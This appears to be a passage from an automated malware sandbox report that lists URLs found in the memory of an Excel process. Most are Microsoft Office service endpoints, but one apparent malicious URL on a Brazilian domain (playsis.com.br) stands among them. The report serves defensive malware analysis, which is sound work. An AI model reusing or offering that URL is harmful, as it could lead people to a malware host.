https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000000.00000003.487737104.0000000013176000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html
Source: EXCEL.EXE, 00000000.00000003.487737104.0000000013176000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.htmlD
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
Source: EXCEL.EXE, 00000000.00000002.586620207.000000000FBC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436471329.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426765815.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458009107.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451359829.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.449812627.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253277111.000000000FBED000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.452598231.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455066934.000000000FBC3000.00000004.00000001.sdmp	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13dll
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp	String found in binary or memory: https://powerlift-frontdesk.acompli.netPowerL
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp	String found in binary or memory: https://powerlift.acompli.netSubstrateOfficeIntelligenceInsightsServicehttps://
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comQ
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workX
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.aiBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.airl
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.aiut
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EXCEL.EXE, 00000000.00000003.458245826.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426971409.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253524497.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436961437.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453590375.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.293240983.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450030728.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451632929.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455517125.000000000FCB7000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.458245826.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426971409.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253524497.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436961437.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453590375.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.293240983.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450030728.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451632929.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455517125.000000000FCB7000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com%
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com(
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
